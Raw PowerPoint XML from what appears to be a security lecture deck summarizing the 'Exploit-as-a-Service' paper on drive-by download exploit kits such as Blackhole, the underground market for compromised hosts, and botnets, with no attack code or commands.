                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8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89" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>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xEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9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4"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4">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="100"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01" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>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4">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10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06" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>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4">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11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11" dur="5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4">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11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118" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>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4">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="121" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="122"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123" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>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4">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="126" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12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128" dur="5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“Manufacturing Compromise: The Emergence of Exploit-as-a-Service”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2759102"/>
            <a:ext cx="10905162" cy="4098897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authors identify the exploit-as-a-service malware distribution model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relies on drive-by-download attacks against browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blackhole, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MPack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and other exploit kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1714074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Methodology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2049928"/>
            <a:ext cx="10868526" cy="4702719"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collect feeds of suspicious URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google Safe Browsing API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spam traps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crowdsourcing (manual identification of drive-by sites)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Live network traffic from Arbor Networks (a large security appliance vendor)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Visit drive-by sites/execute malware in a virtualized environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify and classify exploit kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify and classify droppers, Trojans, and other software installed by the kit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dataset collected between Fall 2011 – Spring 2012</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3671036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665"/>
            <a:ext cx="10515600" cy="983517"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Funnel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1803534" y="1118613"/>
            <a:ext cx="8243385" cy="2251995"/>
            <a:chOff x="1610479" y="1321813"/>
            <a:chExt cx="8243385" cy="2251995"/>
          </a:xfrm>
        </p:grpSpPr>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r="30693" b="30574"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1610479" y="1321813"/>
              <a:ext cx="8243385" cy="2206314"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1648326" y="2310063"/>
              <a:ext cx="1419727" cy="926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47473" y="2647376"/>
              <a:ext cx="4118811" cy="926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47610" y="3152274"/>
              <a:ext cx="3906254" cy="375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70031" y="2918666"/>
              <a:ext cx="537411" cy="317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410075" y="2378891"/>
              <a:ext cx="625643" cy="14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406066" y="2326752"/>
              <a:ext cx="625643" cy="14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605" y="3533074"/>
            <a:ext cx="5824419" cy="3105609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Down Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="528253">
            <a:off x="8536913" y="2921990"/>
            <a:ext cx="654102" cy="8815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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{949A60BD-C496-4690-AA85-91007B0AD253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19566843">
            <a:off x="5663826" y="1859923"/>
            <a:ext cx="647913" cy="19810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91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826"/>
            <a:ext cx="10515600" cy="870618"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malware and Monetization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3939" y="1061079"/>
            <a:ext cx="5320384" cy="5796921"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2015971" y="1133271"/>
            <a:ext cx="8556879" cy="5700666"/>
            <a:chOff x="683374" y="1133271"/>
            <a:chExt cx="8556879" cy="5700666"/>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518" y="2177717"/>
              <a:ext cx="3192675" cy="4656220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5922518" y="1876926"/>
              <a:ext cx="3317735" cy="40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683374" y="1133271"/>
              <a:ext cx="84438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694F555A-5DDA-4F91-9B23-CE0625320BFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9446151" y="691763"/>
            <a:ext cx="1033655" cy="6142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004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Exploit-as-a-Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wrapup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The market for compromised hosts is complex, highly specialized, and well-developed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some actors specialize in writing exploits and packaging them into kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other actors specialize in hosting exploit kits on hacked or bulletproof infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally, some actors specialize in acquiring traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit-as-a-service allows “customers” to choose their payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Diverse relationships between exploit kits and malware payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Customers exhibit a range of monetization strategies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3414374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C99A8-0A8B-42A2-9C22-1FCFD6937180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Have Fun in Siberia</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D11A753B-1677-48E0-9864-4C3276F0780A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="5574680" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2013: Dmitry “Paunch” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fedotov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> arrested along with his dev team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Author and maintainers of Blackhole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Over 1,000 customers, $50k/month in revenue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Roughly $2.3m in total revenue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2016: sentenced to 7 years in a penal colony</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76F505B2-6011-4762-A64C-D6BEBF66F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7320" y="0"/>
            <a:ext cx="5574680" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3712336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024128" y="965199"/>
            <a:ext cx="6766078" cy="4927601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Botnets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8438729" y="965198"/>
            <a:ext cx="2707937" cy="4927602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The backbone of the underground</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">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15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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA288E99-8C2D-4A88-999A-23A6D9C7AD29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7414562" y="632347"/>
            <a:ext cx="3021534" cy="10176"/>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163747" y="162006"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Structure of the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Underground</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="739750" y="855947"/>
          <a:ext cx="10515600" cy="6101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Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3251745" y="4966385"/>
            <a:ext cx="0" cy="145411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85766" y="6180655"/>
            <a:ext cx="0" cy="2398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10438616" y="6171647"/>
            <a:ext cx="0" cy="3315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3251745" y="6421980"/>
            <a:ext cx="8325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504609" y="6162431"/>
            <a:ext cx="0" cy="2864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4504609" y="6448927"/>
            <a:ext cx="7106809" cy="677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a:xfrm>
            <a:off x="11611418" y="2126665"/>
            <a:ext cx="0" cy="43900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flipH="1">
            <a:off x="9973735" y="2126665"/>
            <a:ext cx="163768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B3DBC1-5D68-4327-9F7E-9CC4669056DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4296714" y="6174230"/>
            <a:ext cx="0" cy="49253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FDAFA2-28DA-49EC-B885-3B2BE77B64AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505400" y="6668974"/>
            <a:ext cx="27913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DD76233-8748-48BA-A5C0-85B198F15820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1505400" y="4966385"/>
            <a:ext cx="0" cy="17085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4787FDB-0F75-4C11-ADD9-9A98A3C531E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165979" y="3541057"/>
            <a:ext cx="0" cy="4927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3D054B5-2392-4175-9CD5-CDE7FF4C0A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165979" y="3548530"/>
            <a:ext cx="5996989" cy="465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48BDDD5-F446-438D-9B52-AB2568ADA333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5621701" y="3595111"/>
            <a:ext cx="0" cy="4386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D0F61A8-1D5D-447A-BBA7-869295DDE43F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7161466" y="3595110"/>
            <a:ext cx="0" cy="4386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D536A7E7-A6E2-4715-8939-342DAD5AB441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6556798" y="162005"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
